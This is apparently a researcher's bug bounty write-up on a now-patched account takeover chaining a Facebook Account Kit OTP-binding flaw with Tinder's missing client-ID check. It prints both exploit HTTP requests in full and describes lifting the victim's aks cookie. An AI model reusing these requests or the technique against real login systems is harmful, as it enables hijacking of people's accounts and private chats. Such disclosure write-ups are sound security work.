Tinder Account Takeover Vulnerability via Facebook Account Kit ($6,250 Bug Bounty)

This research is being published with the permission of Facebook under their responsible disclosure policy. The vulnerabilities mentioned in this blog post were plugged quickly by the engineering teams at Facebook and Tinder.


Vulnerability Summary & Impact

This post details an account takeover (ATO) vulnerability I discovered in Tinder’s web and mobile applications. By exploiting this flaw, an attacker could gain full access to a victim’s Tinder account, provided the victim used their phone number to log in.

The root cause of this issue stemmed from a chained vulnerability involving Facebook’s Account Kit (which Facebook has since addressed) and an authentication flaw within the Tinder API.

Both Tinder’s web and mobile applications allow users to use their mobile phone numbers to log into the service. This login architecture was powered by Facebook's Account Kit.

When a user clicks on Login with Phone Number on Tinder.com, they are redirected to Accountkit.com. If authentication is successful, Account Kit passes an access token back to Tinder to authorize the login.

Interestingly, the Tinder API was not validating the client ID on the token provided by Account Kit. This oversight enabled an attacker to use any other app’s Account Kit access token to take over the real Tinder accounts of other users.

Understanding the Affected Services

Facebook Account Kit was a product that allowed users to quickly register for and log into registered third-party apps using just their phone number or email address, bypassing the need for passwords.

Tinder is a highly popular location-based mobile dating application. It allows users to match, swipe, and chat with people nearby.

Step-by-Step Exploit Walkthrough

I discovered a vulnerability in Account Kit through which an attacker could gain access to any user’s Account Kit account using just their phone number. Once inside, the attacker could extract the victim's Account Kit access token (stored in the aks cookie) and use it against Tinder's vulnerable API.

Step 1: Exploiting Facebook Account Kit

First, the attacker logs into the victim’s Account Kit account by supplying the victim’s phone number in the new_phone_number parameter of the API request below.

Note: Account Kit was failing to verify the mapping of the phone number to the supplied One-Time Password (OTP). An attacker could enter anyone’s phone number and successfully authenticate.

After a successful bypass, the attacker simply copies the victim’s aks access token directly from their browser cookies.

The Vulnerable Account Kit API Request:

POST /update/async/phone/confirm/?dpr=2 HTTP/1.1
Host: www.accountkit.com
Content-Type: application/x-www-form-urlencoded

new_phone_number=[victim’s phone number]
&update_request_code=c1fb2e919bb33a076a7c6fe4a9fbfa97[attacker’s request code]
&confirmation_code=258822[attacker’s code]
&user=0&a=1&dyn=&req=6&be=-1&pc=PHASED%3ADEFAULT&__rev=3496767&fb_dtsg=&jazoest=

Step 2: Exploiting the Tinder API

With the victim's aks token secured, the attacker replays the following request into Tinder's authentication API.

Because Tinder failed to validate the client ID attached to the token, the API accepts the payload, and the attacker is instantly logged into the victim’s Tinder account. The attacker gains full control over the profile—allowing them to read private chats, view personal information, and swipe on other users.

The Vulnerable Tinder API Request:

POST /v2/auth/login/accountkit?locale=en HTTP/1.1
Host: api.gotinder.com
Connection: close
Content-Length: 185
Origin: https://tinder.com
app-version: 1000000
platform: web
User-Agent: Mozilla/5.0 (Macintosh)
content-type: application/json
Accept: */*
Referer: https://tinder.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"token":"[victim's aks token]","id":""}

Disclosure Timeline & Bug Bounty Resolution

Both vulnerabilities were triaged and remediated incredibly quickly by the security and engineering teams at Facebook and Tinder.

  • Facebook Bug Bounty: Awarded $5,000 USD for the Account Kit vulnerability.
  • Tinder Bug Bounty: Awarded $1,250 USD for the API client ID validation flaw.
  • Total Bounty Awarded: $6,250 USD

Further Reading

For additional context on the impact of this vulnerability, you can check out these write-ups:

Thanks for reading! Feel free to share this write-up with the cybersecurity and bug bounty community.

Uber Account Takeover Vulnerability: How I Hijacked Any Uber Account ($6,500 Bug Bounty)

This research is published with the permission of Uber under their responsible disclosure policy. The security vulnerability deta...